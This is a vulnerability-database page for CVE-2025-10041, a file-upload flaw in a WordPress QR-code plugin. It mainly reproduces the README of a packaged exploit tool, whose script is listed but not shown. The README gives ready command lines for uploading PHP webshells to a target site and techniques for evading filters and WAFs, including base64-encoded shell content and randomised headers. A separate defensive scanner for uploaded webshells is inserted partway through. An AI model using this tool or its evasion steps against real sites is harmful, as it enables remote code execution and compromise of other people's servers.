Related vulnerability
            
                
                    Title:
                    WordPress plugin Flex QR Code Generator code issue vulnerability
                        (CVE-2025-10041)
                    
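                    Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers based on PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Flex QR Code Generator versions 1.2.5 and earlier contain a code issue vulnerability, which stems from missing file type validation in the save_qr_code_to_db function and may allow unauthenticated attackers to upload arbitrary files and execute remote code.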
                
        
 
        
            Description
            Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload
        
        
            Introduction
            # CVE-2025-10041
Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload
# 🚨 Flex QR Code Generator ≤ 1.2.5 - Unauthenticated Arbitrary File Upload
---
## 📝 Description
The **Flex QR Code Generator** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `save_qr_code_to_db()` function in all versions up to, and including, `1.2.5`.  
This allows **unauthenticated attackers** to upload malicious files to the affected site's server, potentially leading to remote code execution.
- **CVE:** `CVE-2025-10041`
- **CVSS:** `9.8 (Critical)`
---
## 💡 About This Script
`CVE-2025-10041.py` is a professional exploit tool designed to automate the attack by leveraging this vulnerability.  
It provides advanced features for bypassing common protections and encoding techniques.
---
## ⚙️ Features
- **Automatic vulnerability detection** (version check)
- **Arbitrary file upload** (including PHP webshells)
- **Filename encoding bypass**: Base64 or URL encoding
- **Content encoding bypass**: PHP base64 wrapper for shell code
- **Randomized HTTP headers** to evade basic WAFs
- **Custom header support**
- **Full command-line interface** with argument parsing and help message
---
## 🖥️ Usage
### 1. **Basic Exploit**
```bash
python3 CVE-2025-10041.py -u http://target.com
```
### 2. **Shell Filename Encoding**
```bash
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
```
### 3. **Shell Content Encoding**
```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
```
### 4. **Custom Shell Filename**
```bash
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
```
### 5. **Advanced (Combine Options)**
```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
```
### 6. **Custom Headers**
```bash
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
```
---
## 🆘 Help
To see all available options and usage instructions:
```bash
python3 CVE-2025-10041.py --help
```
---
## 🔓 Bypass Techniques
- **Filename encoding**: Some servers block `.php` or suspicious names; encoding may evade filters.
- **Content encoding**: Wrapping shell code in `eval(base64_decode(...))` may bypass content filters.
- **Random headers**: Rotating user-agent, referer, and cookies to avoid detection.
- **Custom headers**: Add your own headers for advanced evasion.
---
## 📋 Example Output
```
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
```
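
A defender-side check for the artifacts shown above, as an added example that is not part of the original README or the tool: it walks an uploads directory and flags files with PHP-handled extensions, a PHP open tag, or the `eval(base64_decode(` wrapper, whatever extension the file carries. The extension list, the read cap and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions commonly routed to the PHP handler (assumption: typical server configs).
# Also catches double extensions such as "x.php.png".
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)
# The eval(base64_decode(...)) wrapper this page lists under content encoding.
B64_WRAPPER = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def scan_uploads(root, max_bytes=1 << 20):
    """Return sorted (relative_path, reasons) for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if PHP_EXT.search(name):
                reasons.append("php-extension")
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)  # cap the bytes read per file
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if PHP_TAG.search(data):
                reasons.append("php-open-tag")
            if B64_WRAPPER.search(data):
                reasons.append("eval-base64-wrapper")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample data: one clean image and two planted test files."""
    root = tempfile.mkdtemp(prefix="uploads_")
    samples = {
        "qr_1.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "shell_3.php": b"<?php echo 'constructed sample'; ?>",
        "logo.png": b"<?php eval(base64_decode('AAAA')); ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, reasons in scan_uploads(build_sample_tree()):
        print(f"{rel}: {', '.join(reasons)}")
```

On a real site, point `scan_uploads` at the `wp-content/uploads` directory; a hit on an image-named file is the case an extension-only filter would miss.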
---
## ⚠️ Disclaimer
This script is provided **for educational, research, and authorized penetration testing purposes only**.  
**Unauthorized use** against systems you do not own or have explicit permission to test is strictly prohibited and illegal.  
The author is **not responsible** for any misuse or damage caused by this tool.
---
## ✍️ By:  
*Nxploited (Khaled Alenazi)*
---
        
        File snapshot
        
            
                
 [4.0K]  /data/pocs/c9fb5487c26b60f466a60d2cb4d9fe682675fd50
├── [6.5K]  CVE-2025-10041.py
├── [1.5K]  LICENSE
├── [3.2K]  README.md
└── [  17]  requirements.txt
0 directories, 4 files
                
             
         